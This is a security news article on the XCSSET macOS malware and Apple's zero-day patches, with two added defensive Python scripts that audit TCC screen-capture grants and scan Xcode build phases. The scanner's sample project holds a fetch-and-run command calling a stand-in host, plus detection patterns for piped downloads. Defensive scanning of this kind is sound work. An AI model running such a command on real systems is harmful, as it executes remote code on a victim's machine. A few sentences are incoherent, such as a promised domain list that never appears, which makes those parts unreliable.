Apple Releases Patches to Counter New Zero-day XCSSET Malware Attacks on macOS

Apple has recently released security updates for macOS, tvOS, watchOS, iOS, and the Safari web browser to fix several vulnerabilities, including an actively exploited zero-day vulnerability in macOS. This critical macOS bug could be abused to take screenshots of a user's system and capture images of their activity without the user knowing it.
The company acknowledged that the XCSSET malware attacks were used to bypass macOS privacy protections. Apple said it is aware that the security problems may have been actively exploited. However, it provided neither attack details nor information about the threat actors who may have exploited the zero-days.
According to Bleeping Computer, Apple patched three zero-days in this round of updates. Two of them, CVE-2021-30663 and CVE-2021-30665, affected WebKit on Apple TV 4K and Apple TV HD devices. The third, CVE-2021-30713, impacted macOS Big Sur devices and is a permissions issue in the TCC framework.
In August 2020, Trend Micro revealed a new strain of XCSSET malware. It was developed and written in AppleScript, a scripting language developed by Apple that provides control over script-enabled Mac applications.
One of the most significant features of the XCSSET malware attack is that it leveraged two zero-day exploits. One bypasses System Integrity Protection to steal Safari browser cookies, while the other is used to skip the prompts shown when installing the development version of Safari. The XCSSET malware is capable of the following actions:
It abuses the existing Safari and other browsers to steal user data using exploits.
It exploits a vulnerability to read and dump Safari cookies.
It uses the development version of Safari to inject JavaScript code into websites using a Universal Cross-site Scripting attack.
It uploads files from the infected machine to a server specified by the attacker.
It encrypts files and displays a ransom note if commanded to by the server.
It takes screenshots of the target’s current screen.
The XCSSET malware attacks target Mac developers by infecting Xcode projects, exploiting two zero-day vulnerabilities to steal sensitive information and launch ransomware attacks against targeted systems. XCSSET has since been re-engineered to run on Apple's latest M1 chips. Its new variant implements advanced data-stealing features focused on cryptocurrency applications.
According to Trend Micro, the malware can steal information associated with applications including Evernote, Notes, Telegram, QQ, Skype, and WeChat. It can also launch Universal Cross-site Scripting attacks to inject malicious JavaScript code into the browser and alter what the user sees. This allows the malware to replace cryptocurrency addresses and steal login credentials for online services, including Apple ID, amoCRM, PayPal, Google, Yandex, and SIPMarket.
The Transparency, Consent, and Control (TCC) framework is a macOS subsystem that blocks installed applications from accessing the user's sensitive information unless permission has been explicitly granted through a pop-up prompt. Actions gated by TCC include accessing files in the Documents directory, recording keystrokes, and capturing the screen. When an application tries to perform such an action, a prompt asks the user whether to grant or deny the permission.
In some cases, users are required to authorize permissions for an application themselves. Once a permission is granted, the application is free to act without asking the user again until the permission is manually revoked in the privacy settings. Attackers can exploit this vulnerability with malicious applications that bypass the user's privacy preferences and access sensitive data. Jamf researchers found that the macOS zero-day was used by the XCSSET malware to evade the TCC protections designed to protect the user's privacy.
While Apple did not give details about the zero-day attacks, Jamf researchers found that the patched macOS zero-day, CVE-2021-30713, was used by the threat actors to bypass the TCC protections developed to protect user privacy.
The zero-day flaw allowed attackers to exploit devices using an exploit that takes the form of an AppleScript module.
XCSSET is installed so that it can use the permissions already granted to trojanized applications and exfiltrate sensitive information.
Specifically, the malware checks for screen-capture permissions granted to applications such as Discord, Zoom, WhatsApp, Upwork, TeamViewer, and Skype, and injects itself into the application's folder.
By piggybacking on an installed application that already holds the required permissions, the attacker can use that donor app to create a malicious application that executes on the target device with the donor's permission set.
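A defender's check for the donor-app technique described above, added here as an example (not code from the article, Jamf, or Apple): it lists which bundle identifiers hold the screen-capture grant in a TCC database and then verifies each app's code signature, since a donor bundle whose sealed contents were modified fails strict verification. It assumes the `TCC.db` `access` table layout (the Big Sur `auth_value` column, or the older `allowed` column), that `mdfind` and `codesign` are available, and that the process reading the real database has Full Disk Access; the sample database is constructed for offline testing.

```python
import sqlite3
import subprocess
import tempfile
from pathlib import Path

SCREEN_CAPTURE = "kTCCServiceScreenCapture"  # TCC service name for screen recording
USER_TCC_DB = Path.home() / "Library/Application Support/com.apple.TCC/TCC.db"

def screen_capture_grants(db_path):
    """Return bundle identifiers allowed to capture the screen in a TCC.db.

    Big Sur stores the decision in auth_value (2 = allowed); older releases
    use a boolean 'allowed' column. The query is chosen from the table schema.
    """
    con = sqlite3.connect(str(db_path))
    cols = {row[1] for row in con.execute("PRAGMA table_info(access)")}
    verdict = "auth_value = 2" if "auth_value" in cols else "allowed = 1"
    rows = con.execute(f"SELECT client FROM access WHERE service = ? AND {verdict}",
                       (SCREEN_CAPTURE,)).fetchall()
    con.close()
    return sorted(r[0] for r in rows)

def bundle_signature_ok(bundle_id):
    """Locate the app bundle by identifier and run a strict, deep codesign check.

    Returns True/False for the verification result, or None if no bundle exists.
    A tampered donor app (modified sealed contents) fails this check.
    """
    found = subprocess.run(["mdfind", f"kMDItemCFBundleIdentifier == '{bundle_id}'"],
                           capture_output=True, text=True).stdout.splitlines()
    paths = [p for p in found if p.endswith(".app")]
    if not paths:
        return None
    rc = subprocess.run(["codesign", "--verify", "--deep", "--strict", paths[0]],
                        capture_output=True).returncode
    return rc == 0

def make_sample_db():
    """Constructed Big Sur style TCC.db: two grants, one denial, one other service."""
    path = Path(tempfile.mkdtemp()) / "TCC.db"
    con = sqlite3.connect(str(path))
    con.execute("CREATE TABLE access (service TEXT, client TEXT, "
                "client_type INTEGER, auth_value INTEGER)")
    con.executemany("INSERT INTO access VALUES (?, ?, 0, ?)", [
        (SCREEN_CAPTURE, "us.zoom.xos", 2),              # allowed
        (SCREEN_CAPTURE, "com.hnc.Discord", 2),          # allowed
        (SCREEN_CAPTURE, "com.skype.skype", 0),          # denied
        ("kTCCServiceCamera", "com.apple.FaceTime", 2),  # different service
    ])
    con.commit()
    con.close()
    return path

if __name__ == "__main__":
    for bid in screen_capture_grants(USER_TCC_DB):
        print(bid, "signature ok:", bundle_signature_ok(bid))
```

Note that `codesign --deep --strict` only covers content the bundle's signature seals; files dropped next to the bundle, or in unsealed locations inside it, need a separate look.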
The XCSSET malware has been found in Xcode projects, which serve as a convenient place to hide malicious payloads. Xcode is the integrated development environment (IDE) used to develop Apple applications and software. This unusual infection of developers' projects also led to the discovery of the zero-day vulnerabilities. The affected Xcode projects have been modified so that, on building, they run malicious code that eventually leads to the XCSSET malware being executed on the affected machine.
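A review helper for the infected-project scenario above, added here as an example (not code from the article, Trend Micro, or Jamf). It assumes the build-time payload is wired in as a run-script build phase (a `PBXShellScriptBuildPhase` in `project.pbxproj`), extracts every such phase for a human to read, and flags phases that download into an interpreter, decode an embedded blob, or use `eval`; the sample project text is constructed.

```python
import re
from pathlib import Path

# One shell-script build phase: its keys up to the shellScript string (escaped).
PHASE = re.compile(
    r'isa = PBXShellScriptBuildPhase;(?P<body>.*?)'
    r'shellScript = "(?P<script>(?:[^"\\]|\\.)*)";', re.S)
NAME = re.compile(r'name = "?([^";]+)"?;')
# Heuristics worth a human look; they are review prompts, not proof of infection.
SUSPICIOUS = re.compile(
    r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh|python3?|osascript)\b"
    r"|base64\s+(-d|--decode)\b|\beval\b")

def unescape(s):
    """Undo pbxproj string escaping (\\" and \\n) for display and matching."""
    return s.replace('\\"', '"').replace("\\n", "\n").replace("\\\\", "\\")

def script_phases(pbxproj_text):
    """Return (phase name, script text) for every shell-script build phase."""
    phases = []
    for m in PHASE.finditer(pbxproj_text):
        n = NAME.search(m.group("body"))
        phases.append((n.group(1) if n else "<unnamed>", unescape(m.group("script"))))
    return phases

def flag_suspicious(pbxproj_text):
    """Subset of script_phases() whose script matches a SUSPICIOUS pattern."""
    return [(n, s) for n, s in script_phases(pbxproj_text) if SUSPICIOUS.search(s)]

def audit_project(pbxproj_path):
    return flag_suspicious(Path(pbxproj_path).read_text(errors="replace"))

# Constructed project.pbxproj fragment: one injected phase, one legitimate linter phase.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AB12 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run Script";
			shellPath = /bin/sh;
			shellScript = "curl -fsSL http://example.invalid/payload | sh\n";
		};
		CD34 /* SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			name = SwiftLint;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
/* End PBXShellScriptBuildPhase section */
'''
```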
The second vulnerability relates to how Safari's WebKit operates. Normally, installing the development build requires the user to enter a password, but a bypass was discovered that could be used to perform malicious tasks through the un-sandboxed Safari browser, which in effect hijacks the browser.
CVE-2021-30663: An integer overflow issue in WebKit that could lead to arbitrary code execution when processing maliciously crafted web content.
CVE-2021-30665: A memory corruption issue in WebKit that could be exploited for arbitrary code execution when processing maliciously crafted web content.
During its research, Jamf found multiple hashes that VirusTotal had not previously identified. Apple's built-in malware detector, XProtect, already detected some of the hashes discovered by Jamf. However, additional hashes identified by the Jamf team as XCSSET were found in compromised GitHub repositories. The affected executables were observed under one of five possible filenames in the Xcode project. Here is a list of command and control domains.
It is advisable to use trustworthy and official download sources to avoid XCSSET malware attacks. Here are some tips you can follow.
You can avoid XCSSET malware attacks by keeping macOS up to date. Malwarebytes doubts that Sierra 10.12.2 includes a patch to solve this issue, because up-to-date systems are less vulnerable to these kinds of attacks.
Remove malicious extensions from the Safari browser. Open Safari's menu bar and select "Preferences". Then select "Extensions" in the Preferences window and look for recently installed suspicious extensions. Click "Uninstall" to remove any XCSSET extensions or adware from the browser.
Remove unwanted applications from your "Applications" folder. Look for suspicious applications and drag them to the Trash. After removing unwanted apps that can cause malicious ads, scan your Mac for any remaining unwanted components.
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.